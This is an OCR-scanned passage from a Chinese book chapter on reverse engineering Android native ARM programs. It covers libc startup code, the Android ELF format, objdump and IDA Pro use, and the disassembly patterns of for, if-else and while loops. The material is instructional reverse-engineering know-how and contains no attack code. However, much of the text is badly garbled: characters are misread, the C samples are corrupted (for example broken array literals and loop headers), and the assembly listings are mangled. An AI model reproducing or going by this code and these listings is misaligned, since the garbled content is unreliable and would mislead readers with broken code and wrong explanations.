7 char **argv, **envp; 

8 

9 /* 初始 化 c 运 行 库 环境 */ 

10 . libc init common(elfdata); 

11 

12 /* Several Linux ABIs don't pass the onexit pointer, and the ones that 
l3 * do never use it. Therefore, we ignore it. 

14 ty 

15 

16 /* 调用 pre-init 数 组 函数 */ 

TW call, array(structors-»preinit, array); 

18 

19 #ifndef — i386 

20 /* .ctors section initializers, for non-arm-eabi ABIs */ 

2T call array(structors-»ctors array); 

22 #endif 

23 

24 // 调用 静态 构造 器 数组 函数 

25 call, array(structors-»init array); 

26 

27 argc - (int) *elfdata; // 设 置 argc 

28 argv = (char**)(elfdata + 1); // 设 置 argv 

29 envp = argv + argc + 1; / WE envp 

30 

31 /* The executable may have its own destructors listed in its .fini array 
32 * so we need to ensure that these are called when the program exits 
33 * normally. 

34 xy 

35 if (structors-»fini array) 

36 _ Cxa atexit(  libc fini,structors-»fini array,NULL); 

37 

38 exit (slingshot (argc, argv, envp)); // 调 用 main 函 数 并 结束 程序 

3 3 


静态 链接 的 程序 在 运行 时 “ 亲 力 杀 为 ”， 自 己 初始 化 C 运 行 库 环 境 及 调用 
静态 构造 阅 数 。 最 后 在 第 38 行 调用 了 slingshot 遂 数 ， 也 就 是 程序 的 main 消 


数 ， 最 后 调用 exit() 结 束 程序 。 动 态 链接 的 程序 则 没有 如 此 麻烦 了 ， 因 为 程 
序 运行 前 的 初始 化 工作 已 经 由 linker 完 成 了 ， 动 态 链接 程 序 的 _libc_init 卫 数 
代码 位 于 Android 源 码 目 录 下 的 bioniclibcvbioniclibc_init_dynamic.c 文 件 中 ， 
代码 与 静态 链接 程序 的 _ libc_init 沁 | 数 27 行 以 下 部 分 完全 相同 。 


73 ”原生 文件 格式 


ARM 为 其 平台 运行 的 可 执行 文件 制定 了 一 套 规范 ， 所 运行 的 可 执行 文 
件 为 ARM elf 格 式 。 相 关 规 范文 档 “ARM ELF File Format” 的 下 载 地 址 为 
http://infocenter.arm.com/help/topic/com.arm.doc.dui0101a/DUI0101A. Elf.pdf 
o 在 这 份 文 档 中 ， 没 有 对 elf 格 式 作 过 多 的 要 求 ， 与 传统 Linux 平 台 的 elf 文 档 
格式 十 分 相近 。Android 严 格 遵 守 了 这 份 文档 的 规范 ， 并 扩充 了 部 分 段 结 
构 。 以 下 将 Android 平 台 上 基于 ARM 架 构 的 elf 文 件 称 之 为 Android elf 文 件 。 

Android elf 文 件 的 结构 是 由 生成 程序 时 的 链接 脚本 控制 的 。 不 同 版 本 的 
NDK 以 及 不 同 版 本 的 链接 脚本 生成 的 elf 文 件 的 结构 都 可 能 有 所 不 同 。 遵 照 
ARM 的 约定 ，elf 文 件 整 体 结构 如 图 7-3 所 示 。 


ELF Header 
Program Header Table 


Section 1 


Section 2 


Section Header Table 


图 7-3 Android elf 文 件 


Android NDK 中 的 toolchains\arm-linux-androideabi- 
4.4.3 prebuiltwindowsNarm-linuxandroideabiWibWdscriptsvarmelf linux eabi.xx& 
静态 或 动态 链接 时 默认 链接 的 脚本 ， 该 文件 SECTIONS 小 节 中 的 每 一 项 都 是 
一 个 Section ( 节 区 ) ， 这 些 Section 在 程序 运行 时 有 些 可 以 加 载 到 内 存 中 成 
为 Segment (EX) ， 有 些 则 不 能 加 载 到 内 存 中 ， 这 是 通过 Section 的 属性 来 控 
制 的 。 Android elf 文 件 的 开头 是 ELF Header ， 它 是 elf 的 文件 头 ， 结 构 为 
Elf32_Ehdr， 与 传统 elf 的 Elf32_Ehdr 结 构 相 同 。 接 着 是 连续 存放 的 Program 
Header， 结 构 为 Elf32_Phdr， 同 样 与 传统 elf 的 Elf32_Phdr 结 构 相 同 。 接 下 来 
是 不 同 的 Section， 它 们 在 文件 中 的 顺序 与 SECTIONS 中 定义 的 顺序 相同 。 而 
Section Header 的 结构 为 Elf32_Shdr， 与 传统 elf 文 件 的 Elf32_Shdr 结 构 相 同 。 
在 Android NDK 的 platforms\android-14\arch-arm\usn\include\sys\exec_elf.h 文 件 
中 ， 定 义 了 所 有 Android elf 文 件 格式 涉及 到 的 结构 与 常量 ， 读 者 可 以 参照 
armelf linux_eabi.x 的 Section 名 与 exec_elf.h 的 结构 进行 对 比 学 习 。 为 了 辅助 
读者 理解 Android elf 文 件 格式 ， 笔 者 男 了 一 张 动态 链接 的 Android elf 文 件 的 
格式 图 ， 具 体 请 参看 随 书 的 附 图 3。 

本 书 不 打算 详细 介绍 传统 elf 文 件 的 格式 ， 这 些 内 容 在 很 多 书籍 或 文章 
中 都 有 介绍 ， 没 有 掌握 的 读者 可 以 在 搜索 引擎 中 搜索 “elf 文 件 格式 ”来 进行 


学 习 。 


7.4 ”原生 C 程 序 逆 向 分 析 


本 节 主 要 针对 C 语 言 编写 的 Android 原 生 程序 进行 逆向 分 析 ， 通 过 阅读 
不 同 结构 的 C 程 序 的 反 汇编 代码 ， 快 速 掌握 原生 C 程 序 的 逆向 分 析 方 法 。 


7.41 ”原生 程序 的 分 析 方 法 


原生 程序 的 逆向 分 析 主要 是 通过 阅读 反 汇 编 代 码 来 理解 程序 流程 及 功 
能 ， 因 此 ， 需 要 有 强大 的 反 汇 编 工 具 来 辅助 我 们 完成 分 析 工 作 ， 下 面 介 绍 


两 个 反 汇 编 原生 程序 的 工具 。 

1. objdump 

在 Android NDK 的 工具 链 中 ， 有 一 个 arm-linux-androideabi-objdump 工 
具 ， 可 以 用 它 来 反 汇编 原生 程序 ， 拿 7.1 节 中 的 hello 程 序 做 实例 ， 执 行 命令 
*arm-linux-androideabi-objdump-S hello” 可 输出 如 下 结果 。 


hello: file format elf32-littlearm 
Disassembly of section .plt: 
00008288 «.plt»: 
8288: e52de004 push (1r) ; (str lr, [sp, s$-4]!) 
828c: e59fe004 tar lr, [pc, T4] ; 8298 «main-0x28» 
8290: e08fe00e add Lr; pes lr 
8294: e5bef008 idr pc, (lr; $8]! 
8298: 0000817c .word 0x0000817c 
Disassembly of section .text: 
000082c0 «main»: 
82c0: e92d4800 push (fp, lr) 
82c4: e28db004 add fp, sp, #4 
82c8: e24dd008 sub sp, sp, #8 
82cc: e5050008 str r0, [fp, #-8] 
8280: e50b100c str rl, [fp, 14-12] 
8284: e59£3018 ldr r3, [pc, 424] ; 82f4 «main*«0x34- 
8288: e08£3003 add x3, pc, £3 
82dc: ela00003 mov r0, r3 
8260: ebffffed bl 829c «main-0x24» 
82e4: e3a03000 mov r3, #0 
82e8: ela00003 mov r0, r3 
82ec: e24bd004 sub sp, fp, #4 
82£f0: e8bd8800 pop (fp, pc) 
82f4: 00000050 .word | 0x00000050 
00008300 « start»: 
8300: ela0000d mov r0, sp 
8304: e3a01000 mov rl, #0 
8308: e28£2004 add r2, pc, #4 
830c: e28£3004 add r3, pc, #4 
8310: eaffffe4 b 82a8 «main-0x18» 
8314: eaffffe9 b 82c0 «main» 


程序 输出 了 “.plt" 与 “text" 段 的 内 容 ,“.plt" 段 主要 用 于 函数 重 定位 用 
Bg, “:text" 段 为 我 们 程序 的 代码 段 ， 里 面 有 main 与 _start 两 个 图 数 。 这 个 


_start 国 数 就 是 前 面 分析 的 crtbegin_dynamic.S 文 件 中 的 _start 苹 数 ， 具 体 的 代 
码 在 这 里 就 不 讲解 了 ， 还 没有 掌握 的 读者 请 参看 前 面 7.2 节 的 分 析 。 

2. IDA Pro 

IDA Pro 是 目前 市 场 上 最 强大 的 反 汇 编 分 析 工 具 ， 支 持 多 系统 、 多 平台 
架构 的 程序 分 析 ， 截 止 到 目前 为 止 ，IDA Pro 最 新 版 本 为 6.3。 安 装 好 IDA 
Pro 程 序 后 启动 它 ， 将 要 分 析 的 程序 拖 入 IDA Pro 的 主 窗口 ， 会 弹出 如 图 7-4 
所 示 的 对 话 框 。 


À Load a new file 


Load file D: \workspace\chapterT\T. 1\hellol\hello as 
[ELF for ARM (Executable) [elf.ldw] | 


Processor type 


Intel 80x86 processors: metapc 


Analysis 


Enabled 
Loading offset |0:00000000 Indicator enabled 


Options 
Create base for debugging 
[] Load resources 
Rename DLL entries 
[ ] Manual load 
Fill segment gaps 
[1 Loading options 


Create FLAT group 


DLL directory |C: WINDOWS 


图 7-4 IDA Pro 加 载 原生 程序 进行 分 析 


注意 


本 章 讲解 原生 程序 的 逆向 分 析 时 使 用 的 IDA Pro 是 其 官方 网 站 上 提供 的 6.2 demo 版 ， 读 者 可 以 从 
以 下 网 址 下 载 试 用 。 
Linux 版 的 下 载 地址 为 : http://out5.hex-rays.com/files/idademo_linux62.tgz 


Windows 版 的 下 载 地 址 为 : http://out5.hex-rays.com/files/idademo_windows62.exe 


AUEOKIZHIDA Pro 就 会 加 载 并 分 析 程 序 ， 分 析 完 毕 后 的 界面 如 图 7-5 
所 示 。 


L - 
v Y 
off_82F4 aHelloürm 


X. 
D] 


图 7-5 IDA Pro 分 析 结 果 


可 以 看 到 ，IDA Pro 强 大 的 分 析 功 能 已 经 解析 出 了 j_main 跳 转 及 真正 的 
main 了 为数 。 这 时 按 下 空格 键 会 切换 到 图 形 视图 ， 再 次 按 下 空格 键 会 切换 到 
反 汇 编 视 图 ， 以 后 按 下 空格 键 就 会 在 图 形 视 图 与 反 汇 编 视 图 之 间 切 换 ， 如 
果 想 回 到 刚才 的 接近 浏览 器 (Proximity Browser) 视图 ， 点 击 菜 单 
“View > Open subviews > Proximity Browser” 即 可 ， 也 可 以 按 下 CTRL+1 快 捷 
键 ， 然 后 双击 Proximity Browser 项 。 

用 鼠标 点 击 main 孙 数 ， 按 下 空格 键 ， 碍 看 main 国 数 的 代码 ， 如 图 7-6 所 
zh, IDA Pro 直 接 在 “ADD R3, PC, R3” 代 码 行 给 出 了 字符 串 的 注释 ， 这 真是 
非常 人 性 化 的 功能 。 


; segment type: Pure code 
AREA .text, CODE, ALIGN=4 
; ORG 80x82C8 

0DE32 


; Attributes: bp-based frame 


nain 


-BxC 
-8 


SP*, 4R11,LR> 
R11, SP, #4 
SP, #8 
[R11 ,#uar 8] 
[R11 ,#uar €] 
-(aHellofirm - 8x82E8) 
PC, R3 ; “Hello ARM?" 
: 8 


SP, R11, 1 
SP*, (R11,PC) 
; End of function main 


图 7-6 {BIDA Pro 分 析 main 函 数 


7.4.2 for 循环 语句 反 汇编 代码 的 特 后 


顺序 语句 、 循 环 语句 、 分 支 语 句 是 程序 代码 的 主要 语句 结构 ,逆向 分 析 
程序 的 过 程 中 大 多 是 在 和 这 些 语句 在 打交道 ， 因 此 了 解 这 些 代码 所 生成 的 
ARM 指 令 特 征 ， 对 逆向 分 析 工 作 是 大 有 帮助 的 。 

本 节 先 从 for 循 环 语句 开始 ， 实 例 代码 如 下 : 


#include <stdio.h> 
int nums[5l = [l1, 2, 3, 4, KJ 
int forl(int n)( / 3S £or (f 


int © * 0s 
int S z 0; 
for (i » 0; 1 « n; IEF 


B tx 1*2; 


) 
return S; 
} 
int for2(int n)( // 访 问 全 局 数组 
int i - O0; 
int s - 0; 
for (1-0; i < n; i*t*)( 
S += i * i + nums([n-1]; 
) 
return sS; 
) 


int main(int argc, int** argv[])( 
printf("forl1:9dMn*, for1l1(5)); 
printf(*for2:9»dWMn', for2(5)): 
return 0; 


) 


forl 为 普通 的 for 循 环 ，for2 循 环 中 访问 了 全 局 数组 。 将 程序 编译 并 生成 
可 执行 程序 。 


注意 


在 以 后 的 代码 讲解 中 ， 限 于 篇 幅 原 因 不 再 讲述 如 何 编译 生成 原生 程序 ， 如 果 有 读者 还 未 掌握 这 
部 分 内 容 ， 请 重新 阅读 并 参考 7.1.2 小 节 完 成 编译 工作 。 
将 编译 生成 的 程序 拖 入 IDA Pro 主 程序 中 ， 在 main 函 数 处 按 下 空格 键 ， 
查看 反 汇 编 代 码 ，main 国 数 代 码 如 下 : 


\D oo -J0O Ui 4 tQ N Pp 


€O € 0) PB BO NX BS RBS GO BY RD BX GO. Fr ges gem gea pe& sje gea cx pA 0p 
lO F^! o o0 -Jo Ui i» UJ l0 L2 0 DOGON ON Ui i» (0) l2 Lo 


EXPORT 


main 


var Cs 


var 8- 


STMFD 
ADD 
SUB 
STR 
STR 
MOV 
BL 
MOV 
LDR 
ADD 
MOV 
MOV 
BL 
MOV 
BL 
MOV 
LDR 
ADD 
MOV 
MOV 
BL 
MOV 
MOV 
SUB 
LDMFD 


@ 保 存 现场 


@ 设 置 R11 的 值 ， 作 为 栈 帧 指针 使 用 


@ 开 辟 栈 空间 
@ 保 存 参数 1 
@ 保 存 参数 2 

@R0=5 

@ 调 用 for1 


; "forl:$dMn" 
; format 


@ 调 用 printf 
@R0=5 
@ 调 用 for2 


; "for2:$dWMn" 


; format 


@ 调 用 printf 


main 

-0xC 

-8 

SP!, {R11, LR} 
R11, SP, #4 

SP, SP, #8 

RO, [R11,*stvar 8] 
R1, [R11,ftvar C] 
RO, #5 

forl 

R2, RO 

R3, -(aForlD - 0x8414) 
R3, PC, R3 

RO, R3 

Rl, R2 

printf 

RO, #5 

for2 

R2, RO 

R3, z-(aFor2D - 0x8434) 
R3. PO. R3 

BO, R3 

R1, R2 

printf 

R3, #0 

RO, R3 

SP, R11, #4 

SP!, (R11,PC) 


; End of function main 


main 涩 数 在 第 13 行 调用 了 forl 函 数 ， 双 击 forl 函 效 ， 进 入 函数 代码 体 。 
按 下 空格 键 切换 到 图 形 视图 ， 如 图 7-7 所 示 ， 图 中 有 三 种 颜色 的 箭头 : 3A 
箭头 表示 顺序 执行 ， 绿 色 箭头 表示 条 件 满 足 时 执行 ;红色 箭头 表示 条 件 不 
满足 时 执行 。 


7 Attributes: bp-based frame 


EXPORT for1 
for1 


var 2h- -0x24 
var 20- -0x20 
var 1C= -8x1€ 
var 180- -0x10 
var C= -BxC 
var 8- -8 

var ü- 9 


R11, [SP,tü-^*var 8]' 
ADD R11, SP, #0 

SuB SP, SP, #20 

STR RO, [R11,8üx15*var 25] 
MOU R3, #9 

STR R3, [R11,8U8x1^*var 28] 
MOU R3, #0 

STR R3, [R11,98x15*var 1€] 
HOU R3, #9 

STR R3, [R11,9Uüx1^*var 290] 
832€ 


R2, [R11,Wvar €] 
R3, [R11,8var 18] 


R3, [R11,#var 8] 
R8, R3 
[R11,9Uvar C] SP, R11 
R3,LSLI1 SP*, (R11) 
[R11,Wvar 8] LR 
R2, R3 ; End of function For1 
[R11,8var 8] 
[R11,Wvar €] 
R3, M 
[R11,#var €] 


图 7-7 使 用 IDA Prot fori RŽ 


整个 流程 图 结构 清晰 ，for 循 环 的 初始 化 部 分 在 loc_832c 块 的 上 面 ， 刚 进 
入 孙 数 时 ， 程 序 保护 了 现场 ， 开 辟 了 栈 空间 ， 并 初始 化 了 变量 i 与 s， 
loc_832c 这 一 块 是 for 循 环 的 条 件 判断 部 分 。loc_830c 这 一 块 为 for 循 环 的 执行 
体 了 ,“mov R3,R3, LSL#1” 这 行 代码 就 实现 了 i * 2， 接 下 来 <ADD R3,R2,R3" 
就 完成 了 s += i *2， 接 着 是 “ADD R3, R3 #1” 让 R3 自 增 1， 最 后 “STR R3, 
[R11, #var_C]” 保 存 中 间 结 果 ， 完 成 这 一 步 后 跳 转 到 循环 条 件 判断 部 分 ， 如 
果 条 件 满足 就 继续 执行 循环 体 ， 不 满足 就 执行 红色 箭头 指向 的 代码 块 。 

下 面 看 看 for2 国 数 ，for2 函 数 的 流程 图 如 图 7-8 所 示 。 


; Attributes; hp-based frame 


EXPORT for2 
Far2 


var 2hs -x24 
var 20- -üx20 
var 1C- -üx1C 
war itü- -xit 
var b= -(üxt 


R11, [SP ,bruar 8]f 
R11, SP, #0 

SP, SP, Wüx1^ 

R3, - GLOBAL OFFSET TABLE ; PIC mode 


RA, [R11,8üxlhevar | 
R2, #0 

R2, [R11,8x15*var 240] 
R2, #0 

R2, [Rit,Hüxlheuar 1C] 
R2, Wn 

R2, [R11,8üx1u5*var 290] 
loc Bate 


R1, [R11,Nvar E] 
R2, [Rit,Mvar 10] 
R1, R? 

loc 838^ 


R3, [R11,8var 8] 
RA, R3 

[R11 ,sar C] SP, R11 

[R11,8var C] SP*, (R11) 

RB, R? LR 

[R11,8var 18] ; End of function For? 

R2, mM 

-(nums ptr - üxt1ü598) 

[R3,8R2] ; mums 

[R2,R8,LSL12] 

R1, R2 

[R11,8var 8] 

R1, R? 

[R11,8var 8] 

[Ri11,8var 6C] 

R2, tt 

[R11,8var C] 


图 7-8 ”使 用 IDA Pro 分 析 for2 函 数 


for2 孙 数 增 加 了 对 全 局 变量 的 访问 。 在 刚 进入 函数 时 ， 有 这 样 一 条 指 
um 

LDR R3, -z GLOBAL OFFSET TABLE ; PIC mode 

GLOBAL OFFSET_TABLE 名 为 全 局 偏 移 表 ， 称 为 GOT， 注 释 中 的 PIC 
表示 这 是 位 置 无 关 代 码 (Position Independent Code) 。 gcc 编 译 程序 时 期 变 
量 的 装载 地 址 不 能 确定 ，ARM 采 用 了 GOT 来 解决 这 个 问题 。 在 ARM 程 序 编 
译 期 间 ， 编 译 器 将 程序 中 所 有 全 局 变量 的 labal 地 址 存放 到 一 个 “.got” 段 中 ， 
代码 中 对 变量 的 访问 被 设计 成 采用 索引 方式 对 GOT 的 元 素 访问 。 程 序 在 运 
行 时 ，linker 会 读 取 变 量 的 实际 地 址 并 填充 GOT 中 的 各 项 元 素 ， 这 样 在 访问 
变量 时 就 不 会 出 现 变 量 地 址 错误 等 问题 。 实 例 for2 程 序 中 通过 以 下 两 行 代码 
就 获取 了 nums 数 组 的 地 址 : 

LDR R2, =(nums_ptr - 0x10598) 

LDR R2, [R3,R2] ; nums 

第 1 行 代码 是 获取 nums 数 组 在 GOT 中 的 索引 ， 不 管 程序 装载 地 址 如 何 变 
化 ， 这 个 值 是 不 会 变 的 ， 第 2 行 代 码 ，R3 为 GOT 的 首 地 址 ， 以 R3 为 基 址 ， 
寻找 R2 项 中 所 保存 的 地 址 值 ， 并 将 结果 传送 到 R2 寄 存 器 中 ， 一 次 变量 地 址 
的 重 定位 操作 就 巧妙 地 完成 了 。 

for2 了 数 的 for 循 环 执行 体 通过 以 下 三 行 代 码 ， 实 现 了 i* io 


LDR B2, IRI; Pvar Cl 

LDR RO, [R11, #var C] 

MUL RI, RO, R2 

由 于 代码 没 经 过 优化 ， 设 置 R2 与 R0 的 值 时 对 同一 块 内 存 访问 了 两 次 ， 
显得 比较 笨拙 。 

LDR R2, [R2,RO0, ESE 

ADD R5. RL, R2 

LDR R1, [R11,;#var_8] 

ADD R2, Rl, R4 


这 4 行 代码 实现 了 s+= i*i + nums[n-1]。 第 1 行 代 码 R2=R2 + RO *4, RAB 
采用 左 移 4 位 实现 数组 元 素 的 获取 ， 第 2 行 代码 完成 了 i*i+nums[rn-1]， 第 3 
行 与 第 4 行 完成 了 最 后 s 的 赋值 操作 。 


到 这 里 ，for 循 环 的 分 析 就 告 一 段落 了 。 总 结 一 下 for 循 环 代码 的 分 析 过 
TE: for 循 环 是 程序 中 经 常 使 用 到 的 一 种 程序 结构 ， 它 的 代码 执行 路 径 如 
IDA Pro 分 析 中 所 见 ， 呈 一 种 回路 结构 ， 回 路 结构 的 进入 点 是 for 循 环 的 条 件 
判断 部 分 ， 回 路 中 绿色 箭头 指向 的 部 分 为 for 循 环 的 执行 体 ， 回 路 中 红 箭头 
指向 的 部 分 为 循环 的 结束 点 。 


7.4.3 ”让 ...else 分 支 语句 反 汇编 代码 的 特点 


if...else 判 断 分 支 在 程序 中 使 用 最 为 频繁 ， 下 面 看 看 它 的 结构 有 什么 特 
点 。 首 先 编写 一 段 包含 if...else 分 支 语 句 的 程序 。 代 码 如 下 : 


#include <stdio.h> 
void ifl(int n)( //if else 语 句 
区 
printf("the number less than 10*n"); 
) else ( 
printf("the number greater than or equal to 10*n"); 


) 
) 
void if2(int n)( / /多重 if else 语 句 
lfín € xX6)1 
printf("he is a boyMn"); 
) else if(n < 30)( 
printf("he is a young mann"); 
) else if(n « 45)( 
printf("he is a strong mann"); 
) else( 
printf("he is an old man'n"); 
) 
) 
int main(int argc, int** argv[])( 
if1í(5):; 
if2135); 
return 0; 


) 

TzFEAWNTESZiflÓi2, — &i-zBJit..elsei&t), 82E 
it...else 语 句 。 编 译 生成 可 执行 程序 。 并 将 可 执行 程序 拖 入 IDA Pro 中 进行 分 
析 ，if1 函 数 流 程 图 如 7-9 所 示 。 


; Segnent type: Pt code 
AREA .text, CODE , ALIGN-à 
; ORG UxS2?2CU 


SP*, (R11,LR) 
R11, SP, #4 

SP, SP, #8 

RO, [R11,#var 8] 
R3, [R11,#uvar 8] 
R3, #9 


loc 82F8 


R3, -(aTheHunberLessT - Bx82E8) 

R3, PC, R3 ; "the nunber less thar E 

R8, R3 $3 » "(aTheNunber&Great - 8x82FC) 

puts , PC, R3 ; "the number greater than or equal to 190" 
loc 8388 , R3 : 


图 7-9 ”使 用 IDA Pro 分 析 if1 函 数 
整个 函数 被 分 成 了 两 个 执行 路 径 ， 最 后 函数 使 用 了 同一 个 出 口 。 看 初 


始 化 部 分 代码 : 
STR RO, [R11,#var_8] 
LDR R3, [R11,fstvar. 8] 
CMP R3, #9 
BGT loc. 82F0 


前 两 行 代 码 将 R0 的 值 赋 值 给 R3， 即 R3 = n， 第 3 行 拿 R3 与 9 比较 ， 第 4 行 
如 果 R3 大 于 9， 就 跳 到 loc_82F0 处 去 执行 ， 如 果 条 件 不 成 立 ， 就 执行 剩 下 的 


一 个 分 支 。 
LDR R3, -(aTheNumberGreat - 0x82FC) 
ADD R3, PC, R3 ; "the number greater than or equal to 10" 
MOV RO, R3 ; 8 
BL puts 


loc_82F0 分 支 块 有 4 行 代码 ， 前 两 行 通过 重 定位 取出 字符 串 的 地 址 到 
R3， 第 3 行 给 输出 函数 的 参数 赋值 ， 第 4 行 调 用 puts 输 出 结果 。 另 一 个 分 支 的 


代码 类 似 ， 最 后 函数 出 口 恢复 了 SP 寄存 器 并 返回 。 
再 来 看 看 if 函数 的 代码 。 流 程 如 图 7-10 所 示 。 


图 7-10 ”使 用 IDA Pro 分 析 if2 函 数 


for2 是 一 个 多 重 的 if..else 阔 数 。 整 个 函数 的 分 支 结构 呈 树 状 ， 所 有 的 分 
文 都 共用 一 个 图 数 出 口 。 函 数 的 每 个 计 分 文 语 句 都 采用 红色 箭头 指向 ， 每 个 
else… 计 语句 采用 绿色 箭头 指向 ， 所 有 条 件 执行 完 后 都 由 一 个 监 色 箭头 指向 
函数 的 出 口 。 各 个 分 支 体 的 内 容 与 forl 函 数 类 似 ， 这 里 就 不 再 赣 述 了 ， 读 者 
可 以 自己 锻炼 分 析 。 


7.4.4 ”while 循 环 语句 反 汇编 代码 的 特点 


while 循 环 有 do...while 与 while...do 两 种 表现 形式 ， 其 执行 效果 与 for 循 环 
类 似 。 下 面 是 测试 代码 : 


#include <stdio.h> 
int dowhile(int n){ // 先 执行 后 判断 


int i - 1; 
int s = 0; 
do( 

s += i; 


)while(i-- < n); 


return S; 
) 
int whiledo(int n){// 先 判断 后 执行 
int i z 1; 
int s = 0; 
while(i «- n)( 
S += i++; 
} 
return S; 
) 


int main(int argc, int** argv[])( 
printf("dowhile:$dMn", dowhile(100)); 
printf("while:$dWMn", whiledo(100)) 
return 0; 


) 
Jl iX EFE BydowhilebK[Z& E whiledoEK Zi 8317 — EBJIJBE: 求 整数 的 累 
AM dowhile 先 执行 一 次 累加 操作 ， 然 后 进行 判断 ， 如 果 条 件 成 立 ， 就 执 
行 循环 体 ，whiledo 则 先 判 断 条 件 是 否 成 立 ， 条 件 成 立 才 执行 循环 体 。 编 译 
程序 并 将 可 执行 文件 拖 入 IDA Pro 中 ，dowhile 的 执行 流程 如 图 7-11 所 示 。 


EXPORT dowhile 
dowhile 


yar_24= -üx2h 
var 280- -üx28 
var 1C- -xiC 
var 10- -0x10 
var C- -8xC 


R11, [SP,H-"*uar 8]' 
R11, SP, #0 

SP, SP, Hüx1h 

RO, [R11,H0xl'*var 24] 
R3, H 

R3, [R11,40x15*var 20] 
R3, #0 

R3, [R11,H80x15*var 1€] 


[R11,8tvar 8] 
[R11,:2var 6] 
R2, R3 
[R11,HUvar 8] 
[R11,8var €] 
[R11 ,juar 18] 
R3 
#0 
"1 
R3, HüxFF 
[R11,Hüvar €] 
R2, H 
[R11,38var 6] 
#0 

_82E0 


[R11,8var_8] 
R3 
R11 

t, {R11} 


; End of function dowhile 


图 7-11 ”使 用 IDA Pro 分 析 dowhile 函 数 


do...while 分 支 语 句 的 条 件 判 断 与 执行 体 部 分 合成 了 一 个 整体 ， 如 果 条 
件 满 足 就 跳 回 到 执行 体 头 部 重复 执行 ， 条 件 不 满足 就 执行 红色 箭头 指向 的 
部 分 ， 即 从 阔 数 出 口 返回 。 函 数 的 初始 化 代码 如 下 : 


STR R11, [SP, $-4-var 0]! 
ADD R11, SP, #0 

SUB SP, SP, f$ 0x14 

STR RO, [R11,5*40x14-var. 24] 
MOV R3, #1 

STR R3, [R11,f0x14-«var 20] 
MOV R3, #0 

STR R3, [R11,*4f0x14-var 1C] 


第 1 行 代码 将 R11 寄 存 器 讨 入 堆栈 。 第 2 行 设置 R11 寄 存 器 的 值 ， 作 为 栈 
帧 指针 作用 。 第 3 行 开 辟 栈 空间 ， 用 来 存 入 临时 变量 。 第 4 行 保 存 第 一 个 参 
数 n 的 值 。 第 5-6 行 初始 化 并 保存 了 变量 的 值 。 第 7-8 行 初始 化 并 保存 了 变量 s 
的 值 。 

注意 看 上 面 这 上段 代码 ， 第 4 行 寄 存 器 R11 后 面 的 偏 移 量 是 
#0x14+var 24， 也 就 是 var_ 24 加 上 了 第 3 行 偏 移 差 值 ，var_24 在 函数 头 部 分 
被 指出 值 为 -0x24， 而 开辟 栈 空 间 时 却 没有 这 么 大 ， 为 什么 呢 ? RSS, IDA 
Pro 在 解析 这 行 代 码 时 ， 采 用 了 基于 开辟 栈 空 间 前 SP 寄存 器 的 值 来 作为 基 址 
进行 寻 址 ，STR R3,[R11,#0x14+var_24] 实 际 值 为 STR R3,[R11,var 10], IDA 
Pro 在 函数 识别 时 根据 开辟 的 栈 空间 认为 栈 上 有 7 个 变量 ， 并 将 临时 变量 的 
空间 大 小 解析 成 了 0x24， 很 显然 这 样 的 识别 是 不 准确 的 。 要 解决 这 个 问题 
也 很 简单 ， 在 函数 名 上 点 击 右键 = Edit function， 在 弹出 的 Edit function 对 话 
TE FR Rf Local variables area 的 值 改 成 0x14， 上 点 击 OK 按 钮 关闭 对 话 框 。IDA 
Pro 此 时 会 重新 分 析 并 给 出 正确 的 反 汇 编 代 码 如 下 : 


STR R11, [SP,#-4+var_0]! 


ADD R11, SP, #0 

SUB SP, SP, #0x14 
STR RO, [R11,1$-0x10] 
MOV R3. EL 

STR R3, [R11,1$-0xC] 
MOV R3, #0 


STR R3, [R11,$-8] 
这 mue mera ME M cT 不 过 这 不 影响 
ere AE 接 下 来 对 loc_82E0 处 的 代码 进行 分 析 : 


loc 82E0 
2 LDR R2, [R11,svar. 8] GR2-s 
3 LDR R3, [R11,svar C] GR3-i 
4 ADD R3, R2, R3 @R3=s + i 
5 STR R3, [R11,#var_8] @ 保 存 s + i 
6 LDR R2, [R11,svar. C] GR2-i 
7 LDR R3, [Rii var- 10] @R3 =n 
8 CMP R2, R3 @ 比 较 i 与 n 
9 MOVGE R3, #0 EVE (I S m) R3 w D 
10 MOVLT R3, #1 @if(i < n) R3-1 
11 AND R3, R3, #0xFF @R3 与 全 1 进行 与 操作 
12 LDR R2, [R11,svar C] @R2=i 
13 ADD R2, R2, #1 Qi 
14 STR R2, [R11,svar C] effi 
15 CMP R3, #0 @R3 是 否 为 0， 为 0 表示 小 于 i>=n 
16 BNE loc_82E0 eff UT 


第 1 行为 代码 块 的 标号 ， 由 IDA Pro 创 建 ， 第 2 行 代码 取 s 的 值 ， 第 3 行 取 i 
的 值 ， 第 4、5 行 进行 与 的 累加 并 保存 ， 第 7-10 行 比较 i 与 "， 如 果 i 大 于 等 于 
n (n 的 值 为 100) ， 则 R3 赋 值 为 0， 反 之 ，i 小 于 n 时 ，R3 赋 值 为 1。 第 11 行 R3 
与 全 1 进行 与 操作 ， 第 12-14 行 保存 i++ 的 结果 ， 第 15-16 行 进行 条 件 判 断 ， 如 
果 满 足 就 继续 执行 循环 体 。 反 之 ， 取 出 结果 ， 赋 值 给 R0 后 程序 返回 

接 下 来 看 看 whiledo 国 数 。 它 的 流程 如 图 7-12 所 示 。 


; Rttributes: bp-based frame 


EXPORT whiledo 


whiledo 


var 24= -0X24 
var 20- -0x20 
var 1C- -8x1C 
var 18- -0x10 


var C= -üxt 
var B= -8 
var B= (8 


R11 
R11 


R2, R3 


s [SP,u-^*var 8]* 

, SP, 8O 

SP, #0x14 
[R11,160x15*var 25] 
LA 
[R11,80x15*var 28] 
"a 
[R11,u8x1^5*vuar 1€] 


8378 


R2, [Ri1,Nüvar C] 
R3, [Rií1,Nvar 18] 
R2, R3 

loc 835^ 


R3, [R11,8üvar 8] 
RO, R3 

[R11,#var 8] SP, R11 
[R11,tHvar €] SP*, {R11} 


LR 


[R11,#var 8] ; End of function whiledo 
[R11,Hvar €] 


R3, t 


[R11,HUvar €] 


图 7-12 ”使 用 IDA Pro 分 析 whiledo 函 数 


细心 的 读者 会 发 现 ，whiledo 遂 数 的 流程 与 for 循 环 的 流程 图 非常 相似 。 
从 上 面 的 图 中 可 以 发 现 ，whiledo 函 数 的 流程 比 dowhile 的 流程 要 清晰 ， 孙 数 
体 部 分 的 代码 块 分 工 明确 ， 一 目 了 然 。 其 实 ， 在 实际 的 编码 过 程 中 ， 尽 管 
for 循 环 与 while 循 环 在 细节 上 有 所 差别 ， 但 有 很 多 时 候 是 可 以 互相 取代 的 。 


7.4.5 switch 分 支 语 句 反 汇 编 代 码 的 特点 


